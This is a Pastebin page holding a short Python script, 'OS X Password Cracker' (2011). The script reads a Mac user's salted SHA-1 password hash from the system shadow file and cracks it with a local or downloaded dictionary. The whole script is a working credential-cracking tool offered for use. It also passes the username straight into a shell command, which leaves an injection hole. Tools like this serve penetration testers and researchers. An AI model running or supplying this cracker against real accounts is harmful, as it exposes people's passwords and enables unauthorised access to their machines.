daily pastebin goal
23%
SHARE
TWEET

OS X Password Cracker

defenceindepth Sep 15th, 2011 6,836 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. #***************************************************
  2. #***************************************************
  3. #* Used for cracking OS X passwords on 10.5 and 10.6
  4. #* Must have UID O!
  5. #* Usage: osx_crack.py <username> [dictionary]
  6. #*
  7. #* Patrick Dunstan
  8. #* http://www.defenceindepth.net
  9. #* 2011
  10. #***************************************************
  11. #***************************************************
  12.  
  13. from subprocess import *
  14. import hashlib
  15. import os
  16. import urllib2
  17. import sys
  18.  
  19. link = "http://nmap.org/svn/nselib/data/passwords.lst" # ONLINE PASSWORD FILE
  20.  
  21. def check(password): # HASH PASS AND COMPARE
  22.                
  23.         if not password.startswith("#!"): #IGNORE COMMENTS
  24.  
  25.                 create_sha1 = hashlib.sha1(salt_hex + password)
  26.                 sha1_guess = create_sha1.hexdigest()
  27.                 print("Trying... " + password)
  28.        
  29.                 if sha1 in sha1_guess.upper():
  30.                         print("Cleartext password for user '"+username+"' is : "+password)
  31.                         exit(0)
  32.  
  33. if len(sys.argv) < 2:
  34.         print("Usage: " + sys.argv[0] + " <username> [dictionary]")
  35.         exit(0)
  36.  
  37. username = sys.argv[1]
  38.  
  39. p = Popen("dscl localhost -read /Search/Users/" + username, shell=True, stdout=PIPE) #PULL USER INFORMATION FROM DIRECTORY SERVICES
  40. dscl_out = p.communicate()[0]
  41.  
  42. if "GeneratedUID" not in dscl_out:
  43.         print("ERROR: User appears not to exist. Exiting.")
  44.         exit(0)
  45.  
  46. list = dscl_out.split("\n")
  47. guid = list[10].split(" ")
  48.  
  49. p = Popen("cat /var/db/shadow/hash/" + guid[1], shell=True, stdout=PIPE) #PULL HASH FROM SHADOW FILE
  50. digest = p.communicate()[0]
  51.  
  52. salt = digest[168:176] # TAKE 4 BYTE SALT FROM FRONT
  53. sha1 = digest[177:216] # TAKE REMAINING BYTES FOR HASH
  54.  
  55. print("Attempting to crack...  " + salt + sha1)
  56.  
  57. try:
  58.         salt_hex =  chr(int(salt[0:2], 16)) + chr(int(salt[2:4], 16)) + chr(int(salt[4:6], 16)) + chr(int(salt[6:8], 16)) # CONVERT SALT TO HEX
  59.  
  60. except ValueError:
  61.         print("ERROR: Problem converting salt.")       
  62.         exit(0)
  63.  
  64. if len(sys.argv) == 3: # IF DICTIONARY FILE SPECIFIED
  65.         print("Reading from dictionary file '"+sys.argv[2]+"'.")
  66.         passlist = open(sys.argv[2], "r")
  67.         password = passlist.readline()
  68.  
  69.         while password:
  70.                 check(password.rstrip())
  71.                 password = passlist.readline()
  72.         passlist.close()
  73.  
  74. else: # NO DICTIONARY FILE SPECIFIED
  75.         print("No dictionary file specified. Defaulting to hard coded link.")
  76.         passlist = urllib2.urlopen(link) # DOWNLOAD DICTIONARY FILE
  77.         passwords = passlist.read().split("\n")
  78.  
  79.         for password in passwords:
  80.                 check(password)
  81.  
  82.  
  83. print("\nPassword not found. Try a different dictionary :)")
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top